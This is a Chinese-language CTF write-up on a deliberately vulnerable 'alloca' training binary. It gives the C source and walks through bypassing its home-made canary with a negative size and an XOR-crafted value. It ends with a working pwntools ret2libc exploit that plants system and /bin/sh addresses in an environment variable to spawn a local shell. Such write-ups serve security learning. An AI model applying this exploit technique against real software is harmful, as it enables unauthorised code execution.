0x00:
好久沒玩了...去年十月以后就沒玩過了TAT 這幾天把peach的坑,winafl的坑填了下,就來搞下pwn。
0x01:
這個程序是給了源碼的
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
void clear_newlines(){
int c;
do{
c = getchar();
}while (c != '\n' && c != EOF);
}
int g_canary;
int check_canary(int canary){
int result = canary ^ g_canary;
int canary_after = canary;
int canary_before = g_canary;
printf("canary before using buffer : %d\n", canary_before);
printf("canary after using buffer : %d\n\n", canary_after);
if(result != 0){
printf("what the f...??? how did you fucked this buffer????\n");
}
else{
printf("I told you so. its trivially easy to prevent BOF :)\n");
printf("therefore as you can see, it is easy to make secure software\n");
}
return result;
}
int size;
char* buffer;
int main(){
printf("- BOF(buffer overflow) is very easy to prevent. here is how to.\n\n");
sleep(2);
printf(" 1. allocate the buffer size only as you need it\n");
printf(" 2. know your buffer size and limit the input length\n\n");
printf("- simple right?. let me show you.\n\n");
sleep(2);
printf("- whats the maximum length of your buffer?(byte) : ");
scanf("%d", &size);
clear_newlines();
printf("- give me your random canary number to prove there is no BOF : ");
scanf("%d", &g_canary);
clear_newlines();
printf("- ok lets allocate a buffer of length %d\n\n", size);
sleep(1);
buffer = alloca( size + 4 ); // 4 is for canary
printf("- now, lets put canary at the end of the buffer and get your data\n");
printf("- don't worry! fgets() securely limits your input after %d bytes :)\n", size);
printf("- if canary is not changed, we can prove there is no BOF :)\n");
printf("$ ");
memcpy(buffer+size, &g_canary, 4); // canary will detect overflow.
fgets(buffer, size, stdin); // there is no way you can exploit this.
printf("\n");
printf("- now lets check canary to see if there was overflow\n\n");
check_canary( *((int*)(buffer+size)) );
return 0;
}
主要還是需要突破他的防護,拿到shell。
看下bin文件開了什么保護:
調試發現,check_canary()函數返回的時候,如果恰當的設置g_canary的值,就可以控制返回地值。
然后我就卡在這里了...開啟了NX,只能ROP的思路搞,但是ROP鏈又不知道哪里放置。
0x02:
后來參考了別人的做法,才發現這是個本地利用...直接按照以前玩overthewire學來的套路就可以:sc放在環境變量離,然后確定地址,直接改返回地值過去就可以了。
不過首先要利用ulimit -s unlimited
去固定下libc的加載地址,然后才可以確定system()和/bin/sh地址。
附上我本地調試的時候的exp,環境不同,所以地址可能不同。
from pwn import *
import os
off_system = 0x0003d3e0 # objdump -d /lib/i386-linux-gnu/libc.so.6 | grep system
off_shell = 0x0015ea69 # grep -oba /bin/sh /lib/i386-linux-gnu/libc.so.6
adr_libc = 0x40047000 # ldd alloca
adr_payload = 0x40025857 # searchmem "AAAA"
payload = p32(adr_libc + off_system)
payload += p32(0xdeadbeef)
payload += p32(adr_libc + off_shell)
#test = "AAAABBBBCCCC"
#p = process('./alloca', env = {'LD_PRELOAD': test})
p = process('./alloca', env = {'LD_PRELOAD': payload})
#raw_input("$$")
p.sendline(str(-92))
p.sendline(str((adr_payload + 4) ^ 0x08048250))
p.interactive()
'''
0x40025857 ^ 0x08048250 --> 0x4806da07
Cannot access memory at address 0x4806da03
0x40025857 + 4
'''